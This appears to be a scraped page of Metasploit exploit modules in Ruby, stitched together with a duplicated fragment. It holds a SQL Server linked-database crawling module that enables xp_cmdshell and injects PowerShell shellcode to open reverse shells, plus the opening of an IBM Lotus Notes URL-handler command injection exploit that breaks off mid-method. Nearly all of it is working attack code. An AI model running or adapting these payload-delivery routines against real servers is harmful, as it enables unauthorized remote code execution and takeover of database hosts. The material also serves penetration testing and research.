path.each {|i| temp << i}
# Actual query - defined when the function originally called - ticks multiplied
if path.length == 0
return execute.gsub("'","'"*2**ticks)
# openquery generator
else
sql = "select * from openquery(\"" + temp.shift + "\"," + "'"*2**ticks + query_builder(temp,sql,ticks+1,execute) + "'"*2**ticks + ")"
return sql
end
end
# ---------------------------------------------------------------------
# Method that builds nested openquery statements using during crawling
# ---------------------------------------------------------------------
def query_builder_rpc(path,sql,ticks,execute)
# Temp used to maintain the original masterList[x]["path"]
temp = Array.new
path.each {|i| temp << i}
# Actual query - defined when the function originally called - ticks multiplied
if path.length == 0
return execute.gsub("'","'"*2**ticks)
# Openquery generator
else
exec_at = temp.shift
sql = "exec(" + "'"*2**ticks + query_builder_rpc(temp,sql,ticks+1,execute) + "'"*2**ticks +") at [" + exec_at + "]"
return sql
end
end
# ---------------------------------------------------------------------
# Method for adding new linked database servers to the crawl list
# ---------------------------------------------------------------------
def add_host(name,path,parse_results)
# Used to add new servers to masterList
server = Hash.new
server["name"] = name
temppath = Array.new
path.each {|i| temppath << i }
server["path"] = [temppath]
server["path"].first << name
server["done"] = 0
parse_results.each {|stuff|
server["db_user"] = stuff.at(1)
server["db_sysadmin"] = stuff.at(2)
server["db_version"] = stuff.at(3)
server["db_os"] = stuff.at(4)
server["numlinks"] = stuff.at(6)
}
return server
end
# ---------------------------------------------------------------------
# Method to display configuration information
# ---------------------------------------------------------------------
def show_configs(i,parse_results,entry=false)
print_status(" ")
parse_results.each {|stuff|
# Translate syadmin code
status = stuff.at(5)
if status == 1 then
dbpriv = "sysadmin"
else
dbpriv = "user"
end
# Display database link information
if entry == false
print_status("Linked Server: #{i}")
print_status(" o Link user: #{stuff.at(1)}")
print_status(" o Link privs: #{dbpriv}")
print_status(" o Link version: #{stuff.at(3)}")
print_status(" o Link OS: #{stuff.at(4).strip}")
print_status(" o Links on server: #{stuff.at(6)}")
else
print_status("Server: #{i}")
print_status(" o Server user: #{stuff.at(1)}")
print_status(" o Server privs: #{dbpriv}")
print_status(" o Server version: #{stuff.at(3)}")
print_status(" o Server OS: #{stuff.at(4).strip}")
print_status(" o Server on server: #{stuff.at(6)}")
end
}
end
# ---------------------------------------------------------------------
# Method for generating the report and loot
# ---------------------------------------------------------------------
def write_to_report(i,server,parse_results,linked_server_table,link_status)
parse_results.each {|stuff|
# Parse server information
db_link_user = stuff.at(1)
db_link_sysadmin = stuff.at(2)
db_link_version = stuff.at(3)
db_link_os = stuff.at(4)
# Add link server to the reporting array and set link_status to 'up'
linked_server_table << [server["name"],server["db_version"],server["db_os"],i,db_link_user,db_link_sysadmin,db_link_version,db_link_os,link_status]
return linked_server_table
}
end
# ---------------------------------------------------------------------
# Method for enabling xp_cmdshell
# ---------------------------------------------------------------------
def enable_xp_cmdshell(path,name,shelled)
# Enables "show advanced options" and xp_cmdshell if needed and possible
# They cannot be enabled in user transactions (i.e. via openquery)
# Only enabled if RPC_Out is enabled for linked server
# All changes are reverted after payload delivery and execution
# Check if "show advanced options" is enabled
execute = "select cast(value_in_use as int) FROM sys.configurations WHERE name = 'show advanced options'"
sql = query_builder(path,"",0,execute)
result = mssql_query(sql, false) if mssql_login_datastore
saoOrig = result[:rows].pop.pop
# Check if "xp_cmdshell" is enabled
execute = "select cast(value_in_use as int) FROM sys.configurations WHERE name = 'xp_cmdshell'"
sql = query_builder(path,"",0,execute)
result = mssql_query(sql, false) if mssql_login_datastore
xpcmdOrig = result[:rows].pop.pop
# Try blindly to enable "xp_cmdshell" on the linked server
# Note:
# This only works if rpcout is enabled for all links in the link path.
# If that is not the case it fails cleanly.
if xpcmdOrig == 0
if saoOrig == 0
# Enabling show advanced options and xp_cmdshell
execute = "sp_configure 'show advanced options',1;reconfigure"
sql = query_builder_rpc(path,"",0,execute)
result = mssql_query(sql, false) if mssql_login_datastore
end
# Enabling xp_cmdshell
print_status("\t - xp_cmdshell is not enabled on " + name + "... Trying to enable")
execute = "sp_configure 'xp_cmdshell',1;reconfigure"
sql = query_builder_rpc(path,"",0,execute)
result = mssql_query(sql, false) if mssql_login_datastore
end
# Verifying that xp_cmdshell is now enabled (could be unsuccessful due to server policies, total removal etc.)
execute = "select cast(value_in_use as int) FROM sys.configurations WHERE name = 'xp_cmdshell'"
sql = query_builder(path,"",0,execute)
result = mssql_query(sql, false) if mssql_login_datastore
xpcmdNow = result[:rows].pop.pop
if xpcmdNow == 1 or xpcmdOrig == 1
print_status("\t - Enabled xp_cmdshell on " + name) if xpcmdOrig == 0
if datastore['DEPLOY']
print_status("Ready to deploy a payload #{name}")
if datastore['DEPLOYLIST']==""
datastore['DEPLOYLIST'] = nil
end
if datastore['DEPLOYLIST'] != nil and datastore["VERBOSE"] == true
print_status("\t - Checking if #{name} is on the deploy list...")
end
if datastore['DEPLOYLIST'] != nil
deploylist = datastore['DEPLOYLIST'].upcase.split(',')
end
if datastore['DEPLOYLIST'] == nil or deploylist.include? name.upcase
if datastore['DEPLOYLIST'] != nil and datastore["VERBOSE"] == true
print_status("\t - #{name} is on the deploy list.")
end
unless shelled.include?(name)
powershell_upload_exec(path)
shelled << name
else
print_status("Payload already deployed on #{name}")
end
elsif datastore['DEPLOYLIST'] != nil and datastore["VERBOSE"] == true
print_status("\t - #{name} is not on the deploy list")
end
end
else
print_error("\t - Unable to enable xp_cmdshell on " + name)
end
# Revert soa and xp_cmdshell to original state
if xpcmdOrig == 0 and xpcmdNow == 1
print_status("\t - Disabling xp_cmdshell on " + name)
execute = "sp_configure 'xp_cmdshell',0;reconfigure"
sql = query_builder_rpc(path,"",0,execute)
result = mssql_query(sql, false) if mssql_login_datastore
end
if saoOrig == 0 and xpcmdNow == 1
execute = "sp_configure 'show advanced options',0;reconfigure"
sql = query_builder_rpc(path,"",0,execute)
result = mssql_query(sql, false) if mssql_login_datastore
end
end
# ----------------------------------------------------------------------
# Method that delivers shellcode payload via powershell thread injection
# ----------------------------------------------------------------------
def powershell_upload_exec(path)
# Create powershell script that will inject shell code from the selected payload
myscript ="$code = @\"
[DllImport(\"kernel32.dll\")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport(\"kernel32.dll\")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
[DllImport(\"msvcrt.dll\")]
public static extern IntPtr memset(IntPtr dest, uint src, uint count);
\"@
$winFunc = Add-Type -memberDefinition $code -Name \"Win32\" -namespace Win32Functions -passthru
[Byte[]]$sc =#{Rex::Text.to_hex(payload.encoded).gsub('\\',',0').sub(',','')}
$size = 0x1000
if ($sc.Length -gt 0x1000) {$size = $sc.Length}
$x=$winFunc::VirtualAlloc(0,0x1000,$size,0x40)
for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)}
$winFunc::CreateThread(0,0,$x,0,0,0)"
# Unicode encode powershell script
mytext_uni = Rex::Text.to_unicode(myscript)
# Base64 encode unicode
mytext_64 = Rex::Text.encode_base64(mytext_uni)
# Generate random file names
rand_filename = rand_text_alpha(8)
var_duplicates = rand_text_alpha(8)
# Write base64 encoded powershell payload to temp file
# This is written 2500 characters at a time due to xp_cmdshell ruby function limitations
# Also, line number tracking was added so that duplication lines caused by nested linked
# queries could be found and removed.
print_status("Deploying payload...")
linenum = 0
mytext_64.scan(/.{1,2500}/).each {|part|
execute = "select 1; EXEC master..xp_cmdshell 'powershell -C \"Write \"--#{linenum}--#{part}\" >> %TEMP%\\#{rand_filename}\"'"
sql = query_builder(path,"",0,execute)
result = mssql_query(sql, false) if mssql_login_datastore
linenum = linenum+1
}
# Remove duplicate lines from temp file and write to new file
execute = "select 1;exec master..xp_cmdshell 'powershell -C \"gc %TEMP%\\#{rand_filename}| get-unique > %TEMP%\\#{var_duplicates}\"'"
sql = query_builder(path,"",0,execute)
result = mssql_query(sql, false) if mssql_login_datastore
# Remove tracking tags from lines
execute = "select 1;exec master..xp_cmdshell 'powershell -C \"gc %TEMP%\\#{var_duplicates} | Foreach-Object {$_ -replace \\\"--.*--\\\",\\\"\\\"} | Set-Content %TEMP%\\#{rand_filename}\"'"
sql = query_builder(path,"",0,execute)
result = mssql_query(sql, false) if mssql_login_datastore
# Used base64 encoded powershell command so that we could use -noexit and avoid parsing errors
# If running on 64bit system, 32bit powershell called from syswow64
powershell_cmd = "$temppath=(gci env:temp).value;$dacode=(gc $temppath\\#{rand_filename}) -join '';if((gci env:processor_identifier).value -like\
'*64*'){$psbits=\"#{datastore['POWERSHELL_PATH']} -noexit -noprofile -encodedCommand $dacode\"} else {$psbits=\"powershell.exe\
-noexit -noprofile -encodedCommand $dacode\"};iex $psbits"
powershell_uni = Rex::Text.to_unicode(powershell_cmd)
powershell_64 = Rex::Text.encode_base64(powershell_uni)
# Setup query
execute = "select 1; EXEC master..xp_cmdshell 'powershell -EncodedCommand #{powershell_64}'"
sql = query_builder(path,"",0,execute)
# Execute the playload
print_status("Executing payload...")
result = mssql_query(sql, false) if mssql_login_datastore
# Remove payload data from the target server
execute = "select 1; EXEC master..xp_cmdshell 'powershell -C \"Remove-Item %TEMP%\\#{rand_filename}\";powershell -C \"Remove-Item %TEMP%\\#{var_duplicates}\"'"
sql = query_builder(path,"",0,execute)
result = mssql_query(sql,false)
end
end
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/core/exploit/mssql_commands'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::MSSQL
include Msf::Auxiliary::Report
include Msf::Exploit::CmdStagerVBS
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft SQL Server Database Link Crawling Command Execution',
'Description' => %q{
This module can be used to crawl MS SQL Server database links and deploy
Metasploit payloads through links configured with sysadmin privileges using a
valid SQL Server Login.
If you are attempting to obtain multiple reverse shells using this module we
recommend setting the "DisablePayloadHandler" advanced option to "true", and setting
up a multi/handler to run in the background as a job to support multiple incoming
shells.
If you are interested in deploying payloads to spefic servers this module also
supports that functionality via the "DEPLOYLIST" option.
Currently, the module is capable of delivering payloads to both 32bit and 64bit
Windows systems via powershell memory injection methods based on Matthew Graeber's
work. As a result, the target server must have powershell installed. By default,
all of the crawl information is saved to a CSV formatted log file and MSF loot so
that the tool can also be used for auditing without deploying payloads.
},
'Author' =>
[
'Antti Rantasaari <antti.rantasaari[at]netspi.com>',
'Scott Sutherland "nullbind" <scott.sutherland[at]netspi.com>'
],
'Platform' => [ 'win' ],
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'http://www.slideshare.net/nullbind/sql-server-exploitation-escalation-pilfering-appsec-usa-2012'],
['URL','http://msdn.microsoft.com/en-us/library/ms188279.aspx'],
['URL','http://www.exploit-monday.com/2011_10_16_archive.html']
],
'Platform' => 'win',
'DisclosureDate' => 'Jan 1 2000',
'Targets' =>
[
[ 'Automatic', { } ],
],
'DefaultTarget' => 0
))
register_options(
[
OptBool.new('DEPLOY', [false, 'Deploy payload via the sysadmin links', 'false']),
OptString.new('DEPLOYLIST', [false,'Comma seperated list of systems to deploy to']),
OptString.new('PASSWORD', [true, 'The password for the specified username'])
], self.class)
register_advanced_options(
[
OptString.new('POWERSHELL_PATH', [true, 'Path to powershell.exe', "C:\\windows\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe"])
], self.class)
end
def exploit
# Display start time
time1 = Time.new
print_status("-------------------------------------------------")
print_status("Start time : #{time1.inspect}")
print_status("-------------------------------------------------")
# Check if credentials are correct
print_status("Attempting to connect to SQL Server at #{rhost}:#{rport}...")
if (not mssql_login_datastore)
print_error("Invalid SQL Server credentials")
print_status("-------------------------------------------------")
return
end
# Define master array to keep track of enumerated database information
masterList = Array.new
masterList[0] = Hash.new # Define new hash
masterList[0]["name"] = "" # Name of the current database server
masterList[0]["db_link"] = "" # Name of the linked database server
masterList[0]["db_user"] = "" # User configured on the database server link
masterList[0]["db_sysadmin"] = "" # Specifies if the database user configured for the link has sysadmin privileges
masterList[0]["db_version"] = "" # Database version of the linked database server
masterList[0]["db_os"] = "" # OS of the linked database server
masterList[0]["path"] = [[]] # Link path used during crawl - all possible link paths stored
masterList[0]["done"] = 0 # Used to determine if linked need to be crawled
shelled = Array.new # keeping track of shelled systems - multiple incoming sa links could result in multiple shells on one system
# Setup query for gathering information from database servers
versionQuery = "select @@servername,system_user,is_srvrolemember('sysadmin'),(REPLACE(REPLACE(REPLACE\
(ltrim((select REPLACE((Left(@@Version,CHARINDEX('-',@@version)-1)),'Microsoft','')+ rtrim(CONVERT\
(char(30), SERVERPROPERTY('Edition'))) +' '+ RTRIM(CONVERT(char(20), SERVERPROPERTY('ProductLevel')))+\
CHAR(10))), CHAR(10), ''), CHAR(13), ''), CHAR(9), '')) as version, RIGHT(@@version, LEN(@@version)- 3 \
-charindex (' ON ',@@VERSION)) as osver,is_srvrolemember('sysadmin'),(select count(srvname) from \
master..sysservers where dataaccess=1 and srvname!=@@servername and srvproduct = 'SQL Server')as linkcount"
# Create loot table to store configuration information from crawled database server links
linked_server_table = Rex::Ui::Text::Table.new(
'Header' => 'Linked Server Table',
'Ident' => 1,
'Columns' => ['db_server', 'db_version', 'db_os', 'link_server', 'link_user', 'link_privilege', 'link_version', 'link_os','link_state']
)
save_loot = ""
# Start crawling through linked database servers
while masterList.any? {|f| f["done"] == 0}
# Find the first DB server that has not been crawled (not marked as done)
server = masterList.detect {|f| f["done"] == 0}
# Get configuration information from the database server
sql = query_builder(server["path"].first,"",0,versionQuery)
result = mssql_query(sql, false) if mssql_login_datastore
parse_results = result[:rows]
parse_results.each { |s|
server["name"] = s[0]
server["db_user"] = s[1]
server["db_sysadmin"] = s[5]
server["db_version"] = s[3]
server["db_os"] = s[4]
server["numlinks"] = s[6]
}
if masterList.length == 1
print_good("Successfully connected to #{server["name"]}")
if datastore['VERBOSE'] == true
show_configs(server["name"],parse_results,true)
elsif server["db_sysadmin"] == 1
print_good("Sysadmin on #{server["name"]}")
end
end
if server["db_sysadmin"] == 1
enable_xp_cmdshell(server["path"].first,server["name"],shelled)
end
# If links were found, determine if they can be connected to and add to crawl list
if (server["numlinks"] > 0)
# Enable loot
save_loot = "yes"
# Select a list of the linked database servers that exist on the current database server
print_status("")
print_status("-------------------------------------------------")
print_status("Crawling links on #{server["name"]}...")
# Display number db server links
print_status("Links found: #{server["numlinks"]}")
print_status("-------------------------------------------------")
execute = "select srvname from master..sysservers where dataaccess=1 and srvname!=@@servername and srvproduct = 'SQL Server'"
sql = query_builder(server["path"].first,"",0,execute)
result = mssql_query(sql, false) if mssql_login_datastore
result[:rows].each {|name|
name.each {|name|
# Check if link works and if sysadmin permissions - temp array to save orig server[path]
temppath = Array.new
temppath = server["path"].first.dup
temppath << name
# Get configuration information from the linked server
sql = query_builder(temppath,"",0,versionQuery)
result = mssql_query(sql, false) if mssql_login_datastore
# Add newly aquired db servers to the masterlist, but don't add them if the link is broken or already exists
if result[:errors].empty? and result[:rows] != nil then
# Assign db query results to variables for hash
parse_results = result[:rows]
# Add link server information to loot
link_status = 'up'
write_to_report(name,server,parse_results,linked_server_table,link_status)
# Display link server information in verbose mode
if datastore['VERBOSE'] == true
show_configs(name,parse_results)
print_status(" o Link path: #{masterList.first["name"]} -> #{temppath.join(" -> ")}")
else
if parse_results[0][5] == 1
print_good("Link path: #{masterList.first["name"]} -> #{temppath.join(" -> ")} (Sysadmin!)")
else
print_status("Link path: #{masterList.first["name"]} -> #{temppath.join(" -> ")}")
end
end
# Add link to masterlist hash
unless masterList.any? {|f| f["name"] == name}
masterList << add_host(name,server["path"].first,parse_results)
else
(0..masterList.length-1).each do |x|
if masterList[x]["name"] == name
masterList[x]["path"] << server["path"].first.dup
masterList[x]["path"].last << name
unless shelled.include?(name)
if parse_results[0][2]==1
enable_xp_cmdshell(masterList[x]["path"].last.dup,name,shelled)
end
end
else
break
end
end
end
else
# Add to report
linked_server_table << [server["name"],server["db_version"],server["db_os"],name,'NA','NA','NA','NA','Connection Failed']
# Display status to user
if datastore['VERBOSE'] == true
print_status(" ")
print_error("Linked Server: #{name} ")
print_error(" o Link Path: #{masterList.first["name"]} -> #{temppath.join(" -> ")} - Connection Failed")
print_status(" Failure could be due to:")
print_status(" - A dead server")
print_status(" - Bad credentials")
print_status(" - Nested open queries through SQL 2000")
else
print_error("Link Path: #{masterList.first["name"]} -> #{temppath.join(" -> ")} - Connection Failed")
end
end
}
}
end
# Set server to "crawled"
server["done"]=1
end
print_status("-------------------------------------------------")
# Setup table for loot
this_service = nil
if framework.db and framework.db.active
this_service = report_service(
:host => rhost,
:port => rport,
:name => 'mssql',
:proto => 'tcp'
)
end
# Display end time
time1 = Time.new
print_status("End time : #{time1.inspect}")
print_status("-------------------------------------------------")
# Write log to loot / file
if (save_loot=="yes")
filename= "#{datastore['RHOST']}-#{datastore['RPORT']}_linked_servers.csv"
path = store_loot("crawled_links", "text/plain", datastore['RHOST'], linked_server_table.to_csv, filename, "Linked servers",this_service)
print_status("Results have been saved to: #{path}")
end
end
# ---------------------------------------------------------------------
# Method that builds nested openquery statements using during crawling
# ---------------------------------------------------------------------
def query_builder(path,sql,ticks,execute)
# Temp used to maintain the original masterList[x]["path"]
temp = Array.new
path.each {|i| temp << i}
# Actual query - defined when the function originally called - ticks multiplied
if path.length == 0
return execute.gsub("'","'"*2**ticks)
# openquery generator
else
sql = "select * from openquery(\"" + temp.shift + "\"," + "'"*2**ticks + query_builder(temp,sql,ticks+1,execute) + "'"*2**ticks + ")"
return sql
end
end
# ---------------------------------------------------------------------
# Method that builds nested openquery statements using during crawling
# ---------------------------------------------------------------------
def query_builder_rpc(path,sql,ticks,execute)
# Temp used to maintain the original masterList[x]["path"]
temp = Array.new
path.each {|i| temp << i}
# Actual query - defined when the function originally called - ticks multiplied
if path.length == 0
return execute.gsub("'","'"*2**ticks)
# Openquery generator
else
exec_at = temp.shift
sql = "exec(" + "'"*2**ticks + query_builder_rpc(temp,sql,ticks+1,execute) + "'"*2**ticks +") at [" + exec_at + "]"
return sql
end
end
# ---------------------------------------------------------------------
# Method for adding new linked database servers to the crawl list
# ---------------------------------------------------------------------
def add_host(name,path,parse_results)
# Used to add new servers to masterList
server = Hash.new
server["name"] = name
temppath = Array.new
path.each {|i| temppath << i }
server["path"] = [temppath]
server["path"].first << name
server["done"] = 0
parse_results.each {|stuff|
server["db_user"] = stuff.at(1)
server["db_sysadmin"] = stuff.at(2)
server["db_version"] = stuff.at(3)
server["db_os"] = stuff.at(4)
server["numlinks"] = stuff.at(6)
}
return server
end
# ---------------------------------------------------------------------
# Method to display configuration information
# ---------------------------------------------------------------------
def show_configs(i,parse_results,entry=false)
print_status(" ")
parse_results.each {|stuff|
# Translate syadmin code
status = stuff.at(5)
if status == 1 then
dbpriv = "sysadmin"
else
dbpriv = "user"
end
# Display database link information
if entry == false
print_status("Linked Server: #{i}")
print_status(" o Link user: #{stuff.at(1)}")
print_status(" o Link privs: #{dbpriv}")
print_status(" o Link version: #{stuff.at(3)}")
print_status(" o Link OS: #{stuff.at(4).strip}")
print_status(" o Links on server: #{stuff.at(6)}")
else
print_status("Server: #{i}")
print_status(" o Server user: #{stuff.at(1)}")
print_status(" o Server privs: #{dbpriv}")
print_status(" o Server version: #{stuff.at(3)}")
print_status(" o Server OS: #{stuff.at(4).strip}")
print_status(" o Server on server: #{stuff.at(6)}")
end
}
end
# ---------------------------------------------------------------------
# Method for generating the report and loot
# ---------------------------------------------------------------------
def write_to_report(i,server,parse_results,linked_server_table,link_status)
parse_results.each {|stuff|
# Parse server information
db_link_user = stuff.at(1)
db_link_sysadmin = stuff.at(2)
db_link_version = stuff.at(3)
db_link_os = stuff.at(4)
# Add link server to the reporting array and set link_status to 'up'
linked_server_table << [server["name"],server["db_version"],server["db_os"],i,db_link_user,db_link_sysadmin,db_link_version,db_link_os,link_status]
return linked_server_table
}
end
# ---------------------------------------------------------------------
# Method for enabling xp_cmdshell
# ---------------------------------------------------------------------
def enable_xp_cmdshell(path,name,shelled)
# Enables "show advanced options" and xp_cmdshell if needed and possible
# They cannot be enabled in user transactions (i.e. via openquery)
# Only enabled if RPC_Out is enabled for linked server
# All changes are reverted after payload delivery and execution
# Check if "show advanced options" is enabled
execute = "select cast(value_in_use as int) FROM sys.configurations WHERE name = 'show advanced options'"
sql = query_builder(path,"",0,execute)
result = mssql_query(sql, false) if mssql_login_datastore
saoOrig = result[:rows].pop.pop
# Check if "xp_cmdshell" is enabled
execute = "select cast(value_in_use as int) FROM sys.configurations WHERE name = 'xp_cmdshell'"
sql = query_builder(path,"",0,execute)
result = mssql_query(sql, false) if mssql_login_datastore
xpcmdOrig = result[:rows].pop.pop
# Try blindly to enable "xp_cmdshell" on the linked server
# Note:
# This only works if rpcout is enabled for all links in the link path.
# If that is not the case it fails cleanly.
if xpcmdOrig == 0
if saoOrig == 0
# Enabling show advanced options and xp_cmdshell
execute = "sp_configure 'show advanced options',1;reconfigure"
sql = query_builder_rpc(path,"",0,execute)
result = mssql_query(sql, false) if mssql_login_datastore
end
# Enabling xp_cmdshell
print_status("\t - xp_cmdshell is not enabled on " + name + "... Trying to enable")
execute = "sp_configure 'xp_cmdshell',1;reconfigure"
sql = query_builder_rpc(path,"",0,execute)
result = mssql_query(sql, false) if mssql_login_datastore
end
# Verifying that xp_cmdshell is now enabled (could be unsuccessful due to server policies, total removal etc.)
execute = "select cast(value_in_use as int) FROM sys.configurations WHERE name = 'xp_cmdshell'"
sql = query_builder(path,"",0,execute)
result = mssql_query(sql, false) if mssql_login_datastore
xpcmdNow = result[:rows].pop.pop
if xpcmdNow == 1 or xpcmdOrig == 1
print_status("\t - Enabled xp_cmdshell on " + name) if xpcmdOrig == 0
if datastore['DEPLOY']
print_status("Ready to deploy a payload #{name}")
if datastore['DEPLOYLIST']==""
datastore['DEPLOYLIST'] = nil
end
if datastore['DEPLOYLIST'] != nil and datastore["VERBOSE"] == true
print_status("\t - Checking if #{name} is on the deploy list...")
end
if datastore['DEPLOYLIST'] != nil
deploylist = datastore['DEPLOYLIST'].upcase.split(',')
end
if datastore['DEPLOYLIST'] == nil or deploylist.include? name.upcase
if datastore['DEPLOYLIST'] != nil and datastore["VERBOSE"] == true
print_status("\t - #{name} is on the deploy list.")
end
unless shelled.include?(name)
powershell_upload_exec(path)
shelled << name
else
print_status("Payload already deployed on #{name}")
end
elsif datastore['DEPLOYLIST'] != nil and datastore["VERBOSE"] == true
print_status("\t - #{name} is not on the deploy list")
end
end
else
print_error("\t - Unable to enable xp_cmdshell on " + name)
end
# Revert soa and xp_cmdshell to original state
if xpcmdOrig == 0 and xpcmdNow == 1
print_status("\t - Disabling xp_cmdshell on " + name)
execute = "sp_configure 'xp_cmdshell',0;reconfigure"
sql = query_builder_rpc(path,"",0,execute)
result = mssql_query(sql, false) if mssql_login_datastore
end
if saoOrig == 0 and xpcmdNow == 1
execute = "sp_configure 'show advanced options',0;reconfigure"
sql = query_builder_rpc(path,"",0,execute)
result = mssql_query(sql, false) if mssql_login_datastore
end
end
# ----------------------------------------------------------------------
# Method that delivers shellcode payload via powershell thread injection
# ----------------------------------------------------------------------
def powershell_upload_exec(path)
# Create powershell script that will inject shell code from the selected payload
myscript ="$code = @\"
[DllImport(\"kernel32.dll\")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport(\"kernel32.dll\")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
[DllImport(\"msvcrt.dll\")]
public static extern IntPtr memset(IntPtr dest, uint src, uint count);
\"@
$winFunc = Add-Type -memberDefinition $code -Name \"Win32\" -namespace Win32Functions -passthru
[Byte[]]$sc =#{Rex::Text.to_hex(payload.encoded).gsub('\\',',0').sub(',','')}
$size = 0x1000
if ($sc.Length -gt 0x1000) {$size = $sc.Length}
$x=$winFunc::VirtualAlloc(0,0x1000,$size,0x40)
for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)}
$winFunc::CreateThread(0,0,$x,0,0,0)"
# Unicode encode powershell script
mytext_uni = Rex::Text.to_unicode(myscript)
# Base64 encode unicode
mytext_64 = Rex::Text.encode_base64(mytext_uni)
# Generate random file names
rand_filename = rand_text_alpha(8)
var_duplicates = rand_text_alpha(8)
# Write base64 encoded powershell payload to temp file
# This is written 2500 characters at a time due to xp_cmdshell ruby function limitations
# Also, line number tracking was added so that duplication lines caused by nested linked
# queries could be found and removed.
print_status("Deploying payload...")
linenum = 0
mytext_64.scan(/.{1,2500}/).each {|part|
execute = "select 1; EXEC master..xp_cmdshell 'powershell -C \"Write \"--#{linenum}--#{part}\" >> %TEMP%\\#{rand_filename}\"'"
sql = query_builder(path,"",0,execute)
result = mssql_query(sql, false) if mssql_login_datastore
linenum = linenum+1
}
# Remove duplicate lines from temp file and write to new file
execute = "select 1;exec master..xp_cmdshell 'powershell -C \"gc %TEMP%\\#{rand_filename}| get-unique > %TEMP%\\#{var_duplicates}\"'"
sql = query_builder(path,"",0,execute)
result = mssql_query(sql, false) if mssql_login_datastore
# Remove tracking tags from lines
execute = "select 1;exec master..xp_cmdshell 'powershell -C \"gc %TEMP%\\#{var_duplicates} | Foreach-Object {$_ -replace \\\"--.*--\\\",\\\"\\\"} | Set-Content %TEMP%\\#{rand_filename}\"'"
sql = query_builder(path,"",0,execute)
result = mssql_query(sql, false) if mssql_login_datastore
# Used base64 encoded powershell command so that we could use -noexit and avoid parsing errors
# If running on 64bit system, 32bit powershell called from syswow64
powershell_cmd = "$temppath=(gci env:temp).value;$dacode=(gc $temppath\\#{rand_filename}) -join '';if((gci env:processor_identifier).value -like\
'*64*'){$psbits=\"#{datastore['POWERSHELL_PATH']} -noexit -noprofile -encodedCommand $dacode\"} else {$psbits=\"powershell.exe\
-noexit -noprofile -encodedCommand $dacode\"};iex $psbits"
powershell_uni = Rex::Text.to_unicode(powershell_cmd)
powershell_64 = Rex::Text.encode_base64(powershell_uni)
# Setup query
execute = "select 1; EXEC master..xp_cmdshell 'powershell -EncodedCommand #{powershell_64}'"
sql = query_builder(path,"",0,execute)
# Execute the playload
print_status("Executing payload...")
result = mssql_query(sql, false) if mssql_login_datastore
# Remove payload data from the target server
execute = "select 1; EXEC master..xp_cmdshell 'powershell -C \"Remove-Item %TEMP%\\#{rand_filename}\";powershell -C \"Remove-Item %TEMP%\\#{var_duplicates}\"'"
sql = query_builder(path,"",0,execute)
result = mssql_query(sql,false)
end
end
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information
↧
Metasploit: IBM Lotus Notes Client URL Handler Command Injection
##
#Credit: Moritz Jodeit, Sean de Regge, juan vazquez
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info={})
super(update_info(info,
'Name' => "IBM Lotus Notes Client URL Handler Command Injection",
'Description' => %q{
This modules exploits a command injection vulnerability in the URL handler for
for the IBM Lotus Notes Client <= 8.5.3. The registered handler can be abused with
an specially crafted notes:// URL to execute arbitrary commands with also arbitrary
arguments. This module has been tested successfully on Windows XP SP3 with IE8,
Google Chrome 23.0.1271.97 m and IBM Lotus Notes Client 8.5.2.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Moritz Jodeit', # Vulnerability discovery
'Sean de Regge', # Vulnerability analysis
'juan vazquez' # Metasploit
],
'References' =>
[
[ 'CVE', '2012-2174' ],
[ 'OSVDB', '83063' ],
[ 'BID', '54070' ],
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-154/' ],
[ 'URL', 'http://pwnanisec.blogspot.com/2012/10/exploiting-command-injection.html' ],
[ 'URL', 'http://www-304.ibm.com/support/docview.wss?uid=swg21598348' ]
],
'Payload' =>
{
'Space' => 2048,
'StackAdjustment' => -3500
},
'DefaultOptions' =>
{
'EXITFUNC' => "none",
'InitialAutoRunScript' => 'migrate -k -f'
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', {} ]
],
'Privileged' => false,
'DisclosureDate' => "Jun 18 2012",
'DefaultTarget' => 0))
register_options(
[
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
], self.class)
end
def exploit
@exe_name = rand_text_alpha(2) + ".exe"
@stage_name = rand_text_alpha(2) + ".js"
super
end
def on_new_session(session)
if session.type == "meterpreter"
session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
end
@dropped_files.delete_if do |file|
win_file = file.gsub("/", "\\\\")
if session.type == "meterpreter"
begin
wintemp = session.fs.file.expand_path("%TEMP%")
win_file = "#{wintemp}\\#{win_file}"
# Meterpreter should do this automatically as part of
# fs.file.rm(). Until that has been implemented, remove the
# read-only flag with a command.
session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|)
session.fs.file.rm(win_file)
print_good("Deleted #{file}")
true
